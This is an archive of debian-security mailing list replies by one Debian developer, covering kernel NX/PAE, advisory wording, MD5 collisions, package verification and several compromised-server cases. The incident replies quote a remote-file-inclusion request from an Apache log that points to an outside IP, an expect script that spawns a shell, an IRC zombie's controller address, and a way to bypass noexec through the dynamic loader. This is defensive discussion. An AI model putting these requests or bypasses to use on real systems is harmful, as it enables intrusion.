Re: Command 'su' is not working in virtual console
On Fri, Dec 16, 2011 at 06:26:08PM +0100, Marko Randjelovic wrote: I have very disturbing problem, so I hope someone will be in situation to help me. As I said in title, su is not working in virtual console for any combination of from-to users. In gnome-terminal it is working. sudo is also working. When I type 'su', is't the same as I just typed RETURN without any command, but exit status is 1. Last time this happened for me it turned out that su was not SUID root :-) -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20111216192503.GB11387@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Mon, Oct 11, 2010 at 11:08:04PM -0500, Boyd Stephen Smith Jr. wrote: On Monday, October 11, 2010 17:18:34 you wrote: On 10/11/2010 12:21 PM, Boyd Stephen Smith Jr. wrote: What can be done to not disable page protections in the default kernel? Enable PAE. From what I understand, the features are not separable in the i386 kernel. You either suffer under PAE and get NX, or you suffer without NX and drop PAE. That's my understanding too. I was really asking about the default. Most of us would prefer the 1% performance hit over having an executable stack (and heap). Then install -bigmem, reboot and be done. Remember that Debian i386 targets more than beefy servers. In fact, it probably has a larger install base on Atom-based router boards, All-in-one PCs, and netbooks. And it might be non-obvious, but some CPUs (e.g. the one in my not-so-old laptop) don't support PAE, so making the default kernel use PAE would make debian unbootable on them. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20101012101045.ga3...@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Tue, Oct 12, 2010 at 05:29:03AM -0500, Jordon Bedwell wrote: On Tue, 2010-10-12 at 11:10 +0100, Marcin Owsiany wrote: And it might be non-obvious, but some CPUs (e.g. the one in my not-so-old laptop) don't support PAE, so making the default kernel use PAE would make debian unbootable on them. Because it's too hard to have ubiquity What's ubiquity? run a script that checks if the processor supports PAE and then enable it by default if it does, right? Enable what? Last time I checked, a given kernel image either user PAE or not, there was no flag to control it. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20101012103542.gc3...@beczulka
Re: non-executable stack (via PT_GNU_STACK) not being enforced
On Tue, Oct 12, 2010 at 05:48:23AM -0500, Jordon Bedwell wrote: Last I checked there were ways of carrying multiple Kernels and enabling them on need-be basis Oh, sure. I'm just pointing out that the performance hit one experiences with PAE is not the only factor to take into consideration when making the decision whether to enable PAE in the default kernel. Indeed some installer support for kernel selection would be more than desirable in such case. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20101012114254.gd3...@beczulka
Re: /dev/shm/r?
On Mon, Jun 01, 2009 at 12:26:49PM +0200, Vladislav Kurz wrote: On Monday 01 of June 2009, Johann Spies wrote: spawn /bin/bash interact Note that this seems to be a simple expect(1) script which runs a shell. Not necessarily an indication of anything apart from a possible attacker trying to exploit something using expect. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: How safely to stop using backports repo?
On Thu, May 28, 2009 at 01:20:25AM +0700, sthu.d...@gmail.com wrote: Good day, MARGUERIE. Thank You for Your reply: Otherwise, you can `apt-get remove` them (plus --purge if you want to reset your configuration files) and re-install them : that way you'll use the main-repo version and you won't want have security problems anymore. That decision I feared... Is there a automatic way that can give me a list of the packages came from backports repo? plug type=shameless you might want to have a look at apt-forktracer /plug -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Fri, Dec 12, 2008 at 11:37:35AM -0700, dann frazier wrote: On Fri, Dec 12, 2008 at 08:53:43AM +, Marcin Owsiany wrote: On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote: On Thu, Dec 11, 2008 at 06:49:59PM +, Dominic Hargreaves wrote: On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote: Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered. Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly. Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok? Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion. I'd suggest you add something more explicit, maybe: [fashion], that is when higher-severity issues are fixed. or something similar. Well, I don't think that's what I mean. High-severity fixes will release as soon as possible - likely simultaneously. Well, that is what I meant as well, but my English is apparently not good enough to express it. I think there is a single fact that the reader should get from this: Low severity fixes often wait until there is a need for a high-severity fix. Does that sound better? -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Sat, Dec 13, 2008 at 10:38:30AM +0100, Moritz Muehlenhoff wrote: On 2008-12-13, Marcin Owsiany porri...@debian.org wrote: On Fri, Dec 12, 2008 at 11:37:35AM -0700, dann frazier wrote: On Fri, Dec 12, 2008 at 08:53:43AM +, Marcin Owsiany wrote: On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote: On Thu, Dec 11, 2008 at 06:49:59PM +, Dominic Hargreaves wrote: On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote: Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered. Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly. Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok? Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion. I'd suggest you add something more explicit, maybe: [fashion], that is when higher-severity issues are fixed. or something similar. Well, I don't think that's what I mean. High-severity fixes will release as soon as possible - likely simultaneously. Well, that is what I meant as well, but my English is apparently not good enough to express it. I think there is a single fact that the reader should get from this: Low severity fixes often wait until there is a need for a high-severity fix. Does that sound better? Not quite, in case of an emergency release such as the vmsplice issue (where the exploit was posted in the wild) the low severity issues will rather be postponed to a followup DSA. I don't think my sentence implies that they never wait _even_ longer than a high-severity fix. It just states they they wait. Anyway, all I'm trying to achieve is make that FAQ entry easy to understand for a non-native English speaker. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities
On Thu, Dec 11, 2008 at 12:11:05PM -0700, dann frazier wrote: On Thu, Dec 11, 2008 at 06:49:59PM +, Dominic Hargreaves wrote: On Thu, Dec 11, 2008 at 11:38:28AM -0700, dann frazier wrote: Yes - 2.6.18 is in stable, and as such will be security supported for at least another year. Minor/local DoS security issues in the kernel are very frequent, so updated packages are constantly in preparation. Preparing kernel updates is resource intensive so, unless there's a severe issue, etch users should expect 2.6.18 and 2.6.24 updates to be staggered. Yup, that's pretty much what I expected to hear; thanks for confirming. May I make a suggestion that you include a comment along these lines in the advisory texts? It would help reassure users that things haven't been forgotten about greatly. Yes, this has been a FAQ since the release of etchnhalf. I'll see about adding something to the text template. Does this look ok? Debian 'etch' includes linux kernel packages based upon both the 2.6.18 and 2.6.24 linux releases. All known security issues are carefully tracked against both packages and both packages will receive security updates until security support for Debian 'etch' ceases. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, non-critical 2.6.18 and 2.6.24 updates will typically release in a staggered or leap-frog fashion. I'd suggest you add something more explicit, maybe: [fashion], that is when higher-severity issues are fixed. or something similar. -- Marcin Owsiany porri...@debian.org http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA 1680-1] New clamav packages fix potential codeexecution
On Wed, Dec 10, 2008 at 03:26:46PM -0500, Jim Popovitch wrote: On Wed, Dec 10, 2008 at 15:10, Michael Tautschnig [EMAIL PROTECTED] wrote: I guess only the volatile archive maintainers can help out. Yet they have been silent for several days now on this issue. FTR there's been no response to my postgrey upload to volatile, either, for over two weeks now. regards, -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
Re: secure execution of drivers
On Wed, Nov 19, 2008 at 12:18:57PM +0100, Dani d wrote: hello everybody. I recently had a problem with drivers of my pc. The driver of the wifi sometimes it hung and the last time it broke my entire reiserfs file system and badly I've been able to recover. I would like to know if there is any way to run the drivers on some sort of secure environment so that it fails or is compromised not affect the rest of the system This is one of the goals of microkernel based operating systems such as GNU Hurd or Minix. As for Linux, you can run Xen and have the wifi driver run in a separate driver domain. I never used xen for that particular purpose, so I can't help you with that, but some papers seem to say this is possible. regards, -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: md5 hashes used in security announcements
On Fri, Oct 24, 2008 at 03:12:20PM -0500, Raphael Geissert wrote: Bas Steendijk wrote: 2 files with a colliding hash can only be made by someone who can influence the creation of the file (thus, someone inside debian). he can make a good and a bad version of a package with the same MD5, and the same size. for someone to make a file with the same hash without influence in the creation of the original file would be a preimage attack. Yeah, but remember that the bad version must also be a valid .deb file with something inside that does work; otherwise you may just be able to get some random stuff with the same file size and md5 sum but without any use. P.S. I'm not saying it is impossible (I actually don't know, but let's assume that it is), but chances aren't high. It (generating good and bad package with colliding sum) is actually easier than one might think. The reason is that you can embed any kind of binary blob inside an executable and make the executable behavior dependent on the version of the blob. This is shown here for example: http://www.mscs.dal.ca/~selinger/md5collision/ It was explained nicely in the two PostScript files with identical MD5 hash demo, but I cannot find it now. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator
On Tue, May 13, 2008 at 02:06:39PM +0200, Florian Weimer wrote: It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch. Does openssh store the generation date in the SSH keypair? If so, then could some guru post a way to retrieve that? -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ping22: can not kill this process
On Thu, Jan 03, 2008 at 08:55:11PM -0500, Luis Mondesi wrote: And besides, noexec can't even stop executables anyway. That's the stupidest of flags for mount: $ /lib/ld-linux.so.2 /usr/bin/printf %s\n foo foo I think some of the newer dynamic loaders do check noexec and refuse to circumvent it. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Debian suggestion on File Deletion
Hi David, Thanks for your suggestion, On Wed, Dec 12, 2007 at 12:19:28PM -0800, David de Hilario Richards wrote: The system/administration section of the OS is password protected. This is a good protection against viruses etc that would attack the OS but maybe the Debian developers could include password protecting Emptying the Trash. So when you delete files, they would be sent to the Trash as always but if you want to empty it, a user password would be necessary. This would prevent harm from viruses even though I understand that Linux has very few of them. The same idea could be applied to the Terminal. The Terminal would ask for a password every time you would want to delete a file. The problem is, a malicious program (virus, etc) does not need a Terminal or Trash to delete files. It just directly asks the operating system kernel to do that. The kernel obeys if (simplifying) the program is running as the user who owns the file to be deleted. This is often the case. However, there is functionality called SELinux (Security Enhanced Linux if memory serves) which allows to say specifically which programs are allowed to perform what actions. It makes it possible to restrict malicious programs from doing anything malicious. SELinux is available in the current stable release of Debian. Unfortunately, it is quite difficult to configure, and currently causes problems with programs which are not malicious as well. We hope to get it more useful in future Debian releases. Regards, -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: How to verify debian packages?
On Tue, Nov 06, 2007 at 06:04:40AM -0800, peterer wrote: When I manually download debian packages (from http://www.debian.org/distrib/packages), how can I verify that they have not been tampered with? Individual packages are not signed, so you would basically need to manually repeat the process which APT uses for verifying package integrity: - calculate package's MD5 and SHA sums - look up the package in the Packages file, check they match, calculate the Packages(.gz) file's sums - look that one up in a Release file - verify Release file's signature: Release.gpg You can find each of these files simply by browsing the archive tree. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: verifying archive signature keys?
On Wed, Aug 15, 2007 at 10:54:02AM +0200, Hadmut Danisch wrote: Hi, just a question because someone had asked me for help. The problem was that apt-get update had complained about not beeing able to verify signatures due to a missing pgp key. Was easy to tell to do gpg --recv-key A70DAF536070D3A1 gpg -a --export A70DAF536070D3A1 | sudo apt-key add - but: How would one verify that this key is the correct debian key (and not, e.g. the key used by an intruder to fake packages and simply uploaded to public key repositories)? gpg --check-sigs A70DAF536070D3A1 lists some signatures of several people, but none that I personally know, I don't even know whether these people actually exist. So what's the official way to verify debian archives? I'm not sure if it's official, but I've seen a section on that topic on debian wiki IIRC. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: security.d.o packages for etch built on sarge
On Wed, Jul 18, 2007 at 01:35:41PM +0100, Marcin Owsiany wrote: On Fri, Jul 13, 2007 at 12:08:35PM +0100, Marcin Owsiany wrote: On Mon, Jul 02, 2007 at 07:27:13PM +0200, Moritz Muehlenhoff wrote: Marcin Owsiany wrote: Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP. Indeed, it looks like I used wrong pbuilder tarball to build this one :-( Security team: this just needs a rebuild, but how exactly should I fix this? Can I do a bin-nmu so that other architectures don't need a rebuild? Or should I just prepare 1:1.7~rc2-1etch2 as a new revision and upload that? A binNMU has been done, a package is available at http://debian.netcologne.de/debian/pool/main/e/ekg/ekg_1.7~rc2-1etch1+b1_i386.deb It will also be part of the immediate stable point update. As far as I can see, it has not been uploaded to etch-security, which means it will only become available after the next point release. Can we do anything to speed this up? Sorry to bug you all, but is there any hope? Can I help? I know this is not critical priority, but I've been waiting for over two weeks now for any response on that. Anyone? -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
Re: security.d.o packages for etch built on sarge
On Sat, Jun 30, 2007 at 08:32:20PM -0600, Jan Hetges wrote: On Sun, Jul 01, 2007 at 02:39:37AM +0100, Steve Kemp wrote: On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote: On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote: It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable. I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I won't get any answer in next few days. Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update. I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..) i just tried on a pretty fresh etch install (i386), error message is spanish, but i think understandable: Los siguientes paquetes tienen dependencias incumplidas: ekg: Depende: python2.3 (= 2.3) pero no es instalable E: Paquetes rotos so maybe someone should file grave? against ekg? Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
Re: security.d.o packages for etch built on sarge
On Mon, Jul 02, 2007 at 10:19:25AM +0100, Marcin Owsiany wrote: On Sat, Jun 30, 2007 at 08:32:20PM -0600, Jan Hetges wrote: On Sun, Jul 01, 2007 at 02:39:37AM +0100, Steve Kemp wrote: On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote: On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote: It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable. I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I won't get any answer in next few days. Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update. I've checked the build-logs I've got access to (all except i386) and they seem fine. is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..) i just tried on a pretty fresh etch install (i386), error message is spanish, but i think understandable: Los siguientes paquetes tienen dependencias incumplidas: ekg: Depende: python2.3 (= 2.3) pero no es instalable E: Paquetes rotos so maybe someone should file grave? against ekg? Why I haven't realized you're talking about my package up till now is a mystery to me. I'll check this ASAP. Indeed, it looks like I used wrong pbuilder tarball to build this one :-( Security team: this just needs a rebuild, but how exactly should I fix this? Can I do a bin-nmu so that other architectures don't need a rebuild? Or should I just prepare 1:1.7~rc2-1etch2 as a new revision and upload that? Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: security.d.o packages for etch built on sarge
I just built ekg 1:1.7~rc2-1etch2 which corrects the misbuilt 1:1.7~rc2-1etch1. I double-checked that the changes from 1:1.7~rc2-1 are minimal. It is available as http://marcin.owsiany.pl/tmp/2007-07-02-ekg-1.7~rc2-1etch2.tgz so a member of the security team can either upload it directly, or let me know and I will do it. If you'd rather have it built diferrently, please let me know. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
Re: [SECURITY] [DSA 1289-1] New Linux 2.6.18 packages fix several vulnerabilities
On Sun, May 13, 2007 at 01:33:16PM +0200, Moritz Muehlenhoff wrote: CVE-2007-1496 Michal Miroslaw reported a DoS vulnerability (crash) in netfilter. A remote attacker can cause a NULL pointer dereference in the nfnetlink_log function. CVE says: | nfnetlink_log in netfilter in the Linux kernel before 2.6.20.3 allows | attackers to cause a denial of service (crash) via unspecified vectors | involving the (1) nfulnl_recv_config function, (2) using multiple | packets per netlink message, and (3) bridged packets, which trigger a | NULL pointer dereference. Could someone who knows netfilter a bit better comment on this? In what circumstances in real life is this exploitable? Is there any workaround? I'm not using bridging, I don't care about logging, so I'm happy to disable it, I'm not sure what that netlink thing means.. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Mass update deployment strategy
On Mon, Nov 27, 2006 at 03:37:22PM -0500, George Georgalis wrote: for n in host1 host2 hostz; do ssh [EMAIL PROTECTED] $ENV $UPD ; $UPG $UPC done Check out dsh and its option -c instead of this step :-) Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: a compromised machine
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote: Can you get any information out of this cron file? I tried creating the same exec that this file creats, but obiously i was doing sth wrong :) The crontab writes out a binary file and executes it. I straced the binary on a virtual machine with no network. It's attempting to connect to two different hosts: 210.169.91.66:5454 This is an IRC server. The program seems to be an IRC zombie. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: root login denied. But by what?
On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote: Does anyone know what generated the above log entries? try: find /usr/sbin /sbin /usr/local/sbin \ /usr/bin /usr/local/bin /bin /usr/lib /lib -type f | \ while read f; do if strings $f | egrep -q 'no ip\?!'; then echo it's $f ! fi done And why is there no ip? I guess this is a bug.. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apache / exe process taking 99 % cpu
On Wed, Sep 01, 2004 at 02:30:49AM +0200, Timo Veith wrote: apache access.log: 142.176.141.5 - - [29/Aug/2004:21:51:47 +0200] GET /path/to/index.php?p=http://142.176.141.5:113/ HTTP/1.1 200 2979 - curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7a zlib/1.1.4 The path is the same as the PWD env var, which I found in /proc/pid/environ of the bad process. Now this together with your description could maybe explain how it happen. Check whether the index.php looks like something that was created by the attacker, or it is just a legitimate but buggy script file. How can I genereally close this hole for now? I guess there is a setting in php.ini or so. I will take a look at it. Probably there is a setting for this very feature that facilitated this exploitation (HTTP-enabled open() I guess). But there are two problems with that: new security implications of certain PHP features are discovered rather regularily, and many users depend on such features. Actually allowing not-very-experienced programmers to run arbitrary code on your machine is the more general problem we are facing, for which there is no easy solution. My current plan is to run PHP via suexec, so that I can easily find out which user's website was cracked. Then I would shut down the particular web page and tell the client to either fix it or say goodbye ]:- Unfortunately I hear that there are some PHP features (something having to do with authentication) which don't work when PHP is not run as an Apache module, so I cannot migrate all users in a batch. Generally, PHP is a little bit like a nightmare for me :-) regards, Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apache / exe process taking 99 % cpu
On Wed, Sep 01, 2004 at 12:25:19AM +0200, Timo Veith wrote: On Tuesday 31 August 2004 03:24, Marcin Owsiany wrote: On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote: On Monday 30 August 2004 21:06, Marcin Owsiany wrote: I added a iptables rule to the OUTPUT chain dropping all tcp packets to that box:port and guess what? My server was back idle again. No more 99 % cpu usage and the process now sits there. Seems like the process is a DoS zombie. Probably it opened as many connections to that machine, as possible, and that caused the heavy CPU utilization. Hmm, there wasn't much network traffic, at least not significantly more than some other time. A DoS does not necessarily mean a lot of traffic byte-wise. Remember that it only takes 2 packets sent and one received to initiate a TCP connection. And creating a huge number of connections certainly can be considered a DoS. But anyway.. who knows... maybe it was a broken worm or something.. There's more interessting news: As I stopped apache, the other apache proc immediately took port 443 and listened on it. A little while later also port 80 was in use. I connected to both of them with a browser and with telnet but there was no response. This fact made me think, that someone really hacked me, because port 80 and 443 can only be opened with root permissions. Had the apache you shut down been listening on port 443? I suspect there is an exploit which somehow infects an apache process (probably by exploiting some PHP memory management bug) and takes over the port when apache shuts down. I say so because I have seen such situations two times myself, and there also was no other sign of the attacker gaining root access. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apache / exe process taking 99 % cpu
On Tue, Aug 31, 2004 at 12:59:48AM +0200, Timo Veith wrote: On Monday 30 August 2004 21:06, Marcin Owsiany wrote: I added a iptables rule to the OUTPUT chain dropping all tcp packets to that box:port and guess what? My server was back idle again. No more 99 % cpu usage and the process now sits there. Seems like the process is a DoS zombie. Probably it opened as many connections to that machine, as possible, and that caused the heavy CPU utilization. And then it starts again connecting. I think this process tries to talk back to someone? Well, I am only guessing ... Could be. I would unblock the rule for a while and record some of the traffic. Viewing it with something nice like ethereal could provide more infomation on the nature of those connections. I downloaded the ISO image from the F.I.R.E. Linux distribution to have some static binaries which I can trust. Basically, if you don't trust your binaries, that means that you suspect the attacker got root access. And if they did, they probably installed a kernel backdoor. And if they did, then trusted binaries won't buy you anything. You need to boot off a trusted media if you want to be sure. I burned the image to a cd which I then mounted and tried to excute some of them but I only get su -: Permission denied [EMAIL PROTECTED] [/proc/18305] /mnt/cdrom/statbins/linux2.2_x86/who su: /mnt/cdrom/statbins/linux2.2_x86/who: Permission denied [EMAIL PROTECTED] [/proc/18305] uname -r 2.4.27 Is it maybe because binaries for linux 2.2 cannot be run on a 2.4 kernel? I don't think so. I suspect this is either a permissions (file or filesystem) or dynamic libs problem. Marcin PS: Please don't cc me. I really do read this list :-) -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 